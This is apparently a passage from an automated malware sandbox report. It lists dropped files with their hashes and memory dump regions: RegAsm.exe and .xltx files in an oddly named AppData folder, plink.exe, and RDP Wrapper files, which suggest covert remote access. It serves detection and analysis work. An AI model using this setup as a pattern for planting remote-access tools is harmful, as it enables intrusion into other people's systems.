                                                            Filesize

                                                            921KB

                                                            MD5

                                                            78ba0653a340bac5ff152b21a83626cc

                                                            SHA1

                                                            b12da9cb5d024555405040e65ad89d16ae749502

                                                            SHA256

                                                            05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

                                                            SHA512

                                                            efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                                                            Filesize

                                                            63KB

                                                            MD5

                                                            0d5df43af2916f47d00c1573797c1a13

                                                            SHA1

                                                            230ab5559e806574d26b4c20847c368ed55483b0

                                                            SHA256

                                                            c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc

                                                            SHA512

                                                            f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Rimasta.xltx
                                                            Filesize

                                                            138KB

                                                            MD5

                                                            6dfb1c72ba137b2aa256907636a86427

                                                            SHA1

                                                            df8349a7e235ab63920ede1ba662628e2ec3b9e1

                                                            SHA256

                                                            bd439ef1861dbad75461d95f2ced0e3a6ae9fd776b51fab9f5717444fd89d3ab

                                                            SHA512

                                                            7298f2db3485a48de49645e7deeb1f413e16d3f4f01c96ddc1599be65465d66918c36b7f95db167b67bc03b2b60564dc9437da6aa798ac2a9842d88bfe4b01db

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Solitario.xltx
                                                            Filesize

                                                            389KB

                                                            MD5

                                                            d3394e00792e6cddadf23ad7e89629f6

                                                            SHA1

                                                            e36e73c357ff01cb184fa477c0f2957a21bbac00

                                                            SHA256

                                                            71d98c2ccab23a0bf3701d9e3758d40b152309f96d97d83388663f2985a67e04

                                                            SHA512

                                                            ebd7107dddfa14eb73d3f36e124dd253ad4a7fe11a2b425205ad08a236061e614536622924a5b28bdf5212c10202d0b8b6f4d0040e9a6fba3391d0a1f244707b

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Viso.xltx
                                                            Filesize

                                                            88KB

                                                            MD5

                                                            8fb8bc2a52e6514fcd7c481e3d2c5a19

                                                            SHA1

                                                            b214c89d3960f7c67fe76a55839e6da7342c6b20

                                                            SHA256

                                                            f7dc64367911ef5e81f3bfb586bb0ffa24e2d2fb19f845b2c1fba6c84ca6006e

                                                            SHA512

                                                            4cc02e9a48decb29c927bc2bcc800576370db96573757e1164e6133641641d5edd10f7be01cf7cf7ee6840cfe445e9ab6debfdea60b623950abb2f8a1373fb37

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Roaming\plink.exe
                                                            Filesize

                                                            589KB

                                                            MD5

                                                            a69a5f42dcb18bf37e800bf86b313b36

                                                            SHA1

                                                            3f2e4937339e8153898c2a354c443f4512f3f516

                                                            SHA256

                                                            cba9b840fccc043ca78994dfb7a55046f0fa865690ed9f8f227ab8b3615dd843

                                                            SHA512

                                                            9560ecda06216120afdf42ce838924c03b866312afea27c56c66865fcac591cc0d0e204bf9a074612e4174832c10b2afa8abef304d7a5f73f1e41ff3eb691dd9

                                                            Download Submit

                                                          • \??\c:\program files\rdp wrapper\rdpwrap.dll
                                                            Filesize

                                                            114KB

                                                            MD5

                                                            461ade40b800ae80a40985594e1ac236

                                                            SHA1

                                                            b3892eef846c044a2b0785d54a432b3e93a968c8

                                                            SHA256

                                                            798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                                                            SHA512

                                                            421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                                                            Download Submit

                                                          • \??\c:\program files\rdp wrapper\rdpwrap.ini
                                                            Filesize

                                                            128KB

                                                            MD5

                                                            dddd741ab677bdac8dcd4fa0dda05da2

                                                            SHA1

                                                            69d328c70046029a1866fd440c3e4a63563200f9

                                                            SHA256

                                                            7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

                                                            SHA512

                                                            6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

                                                            Download Submit

                                                          • \??\c:\program files\rdp wrapper\rdpwrap.ini
                                                            Filesize

                                                            188KB

                                                            MD5

                                                            234237e237aecf593574caf95b1432a2

                                                            SHA1

                                                            9b925bd5b9d403e90924f613d1d16ecf12066b69

                                                            SHA256

                                                            d9bb5a5359b3ff1865722b6fbf089f0165c5ce95d1ed9aea624ba57866781ceb

                                                            SHA512

                                                            b0cc341b68692899887a5750d937a8693f1063187f6341b7ac23512216f38381853309fd01440bd869d8816d5fded56486578f0e1169124ffe06ac92ad6723a0

                                                            Download Submit

                                                          • memory/656-356-0x0000000000400000-0x000000000056F000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                            Download

                                                          • memory/848-67-0x0000000000580000-0x00000000005E6000-memory.dmp

                                                            Filesize

                                                            408KB

                                                            Download

                                                          • memory/848-66-0x0000000000580000-0x00000000005E6000-memory.dmp

                                                            Filesize

                                                            408KB

                                                            Download

                                                          • memory/848-63-0x0000000000580000-0x00000000005E6000-memory.dmp

                                                            Filesize

                                                            408KB

                                                            Download

                                                          • memory/848-76-0x0000000000580000-0x00000000005E6000-memory.dmp

                                                            Filesize

                                                            408KB

                                                            Download

                                                          • memory/1716-184-0x0000000005FC0000-0x0000000006314000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                            Download

                                                          • memory/1716-186-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                            Download

                                                          • memory/2008-101-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                            Download

                                                          • memory/2008-117-0x0000000007120000-0x0000000007131000-memory.dmp

                                                            Filesize

                                                            68KB

                                                            Download

                                                          • memory/2008-114-0x0000000006F10000-0x0000000006F2A000-memory.dmp

                                                            Filesize

                                                            104KB

                                                            Download

                                                          • memory/2008-113-0x0000000007550000-0x0000000007BCA000-memory.dmp

                                                            Filesize

                                                            6.5MB

                                                            Download

                                                          • memory/2008-112-0x0000000006DB0000-0x0000000006E53000-memory.dmp

                                                            Filesize

                                                            652KB

                                                            Download

                                                          • memory/2008-111-0x00000000061A0000-0x00000000061BE000-memory.dmp

                                                            Filesize

                                                            120KB

                                                            Download

                                                          • memory/2008-100-0x00000000061C0000-0x00000000061F2000-memory.dmp

                                                            Filesize

                                                            200KB

                                                            Download

                                                          • memory/2008-121-0x0000000007220000-0x0000000007228000-memory.dmp

                                                            Filesize

                                                            32KB

                                                            Download

                                                          • memory/2008-99-0x0000000005BD0000-0x0000000005BEE000-memory.dmp

                                                            Filesize

                                                            120KB

                                                            Download

                                                          • memory/2008-116-0x0000000007180000-0x0000000007216000-memory.dmp

                                                            Filesize

                                                            600KB

                                                            Download

                                                          • memory/2008-98-0x0000000005710000-0x0000000005A64000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                            Download

                                                          • memory/2008-115-0x0000000006F80000-0x0000000006F8A000-memory.dmp

                                                            Filesize

                                                            40KB

                                                            Download

                                                          • memory/2008-88-0x0000000005650000-0x00000000056B6000-memory.dmp

                                                            Filesize

                                                            408KB

                                                            Download

                                                          • memory/2008-87-0x00000000055E0000-0x0000000005646000-memory.dmp

                                                            Filesize

                                                            408KB

                                                            Download

                                                          • memory/2008-86-0x0000000005540000-0x0000000005562000-memory.dmp

                                                            Filesize

                                                            136KB

                                                            Download

                                                          • memory/2008-85-0x0000000004EA0000-0x00000000054C8000-memory.dmp

                                                            Filesize

                                                            6.2MB

                                                            Download

                                                          • memory/2008-84-0x0000000004730000-0x0000000004766000-memory.dmp

                                                            Filesize

                                                            216KB

                                                            Download

                                                          • memory/2008-118-0x0000000007140000-0x000000000714E000-memory.dmp

                                                            Filesize

                                                            56KB

                                                            Download

                                                          • memory/2008-119-0x0000000007150000-0x0000000007164000-memory.dmp

                                                            Filesize

                                                            80KB

                                                            Download

                                                          • memory/2008-120-0x0000000007240000-0x000000000725A000-memory.dmp

                                                            Filesize

                                                            104KB

                                                            Download

                                                          • memory/2036-252-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                            Download

                                                          • memory/2096-146-0x00000000078F0000-0x0000000007993000-memory.dmp

                                                            Filesize

                                                            652KB

                                                            Download

                                                          • memory/2096-136-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                            Download

                                                          • memory/2096-147-0x0000000007C40000-0x0000000007C51000-memory.dmp

                                                            Filesize

                                                            68KB

                                                            Download

                                                          • memory/2096-148-0x0000000007C90000-0x0000000007CA4000-memory.dmp

                                                            Filesize

                                                            80KB

                                                            Download

                                                          • memory/2096-134-0x0000000006260000-0x00000000065B4000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                            Download

                                                          • memory/2608-354-0x0000000000400000-0x000000000056F000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                            Download

                                                          • memory/2748-411-0x0000018A774B0000-0x0000018A774D2000-memory.dmp

                                                            Filesize

                                                            136KB

                                                            Download

                                                          • memory/3088-294-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                            Download

                                                          • memory/3088-304-0x00000000078D0000-0x00000000078E1000-memory.dmp

                                                            Filesize

                                                            68KB

                                                            Download

                                                          • memory/3088-305-0x0000000007910000-0x0000000007924000-memory.dmp

                                                            Filesize

                                                            80KB

                                                            Download

                                                          • memory/3476-342-0x0000000000400000-0x000000000056F000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                            Download

                                                          • memory/3556-366-0x0000000000400000-0x000000000056F000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                            Download

                                                          • memory/4336-83-0x0000000000B00000-0x0000000000CEC000-memory.dmp

                                                            Filesize

                                                            1.9MB

                                                            Download

                                                          • memory/4336-81-0x0000000000B00000-0x0000000000CEC000-memory.dmp

                                                            Filesize

                                                            1.9MB

                                                            Download

                                                          • memory/4336-78-0x0000000000B00000-0x0000000000CEC000-memory.dmp

                                                            Filesize

                                                            1.9MB

                                                            Download

                                                          • memory/4556-62-0x0000000005BF0000-0x0000000005CFA000-memory.dmp

                                                            Filesize

                                                            1.0MB

                                                            Download

                                                          • memory/4556-58-0x0000000005DD0000-0x00000000063E8000-memory.dmp

                                                            Filesize

                                                            6.1MB

                                                            Download

                                                          • memory/4556-55-0x00000000013A0000-0x00000000013BC000-memory.dmp

                                                            Filesize

                                                            112KB

                                                            Download

                                                          • memory/4556-61-0x0000000005910000-0x000000000595C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                            Download

                                                          • memory/4556-60-0x00000000058D0000-0x000000000590C000-memory.dmp

                                                            Filesize

                                                            240KB

                                                            Download

                                                          • memory/4556-59-0x0000000005870000-0x0000000005882000-memory.dmp

                                                            Filesize

                                                            72KB

                                                            Download

                                                          • memory/4744-161-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                            Download

                                                          • memory/4744-171-0x0000000007710000-0x00000000077B3000-memory.dmp

                                                            Filesize

                                                            652KB

                                                            Download

                                                          • memory/4744-155-0x0000000005F00000-0x0000000006254000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                            Download

                                                          • memory/4744-172-0x00000000079E0000-0x00000000079F1000-memory.dmp

                                                            Filesize

                                                            68KB

                                                            Download

                                                          • memory/4744-173-0x0000000007A20000-0x0000000007A34000-memory.dmp

                                                            Filesize

                                                            80KB

                                                            Download

                                                          • memory/4848-317-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                            Download

                                                          • memory/4868-373-0x0000000000400000-0x000000000056F000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                            Download

                                                          • memory/4948-273-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                            Download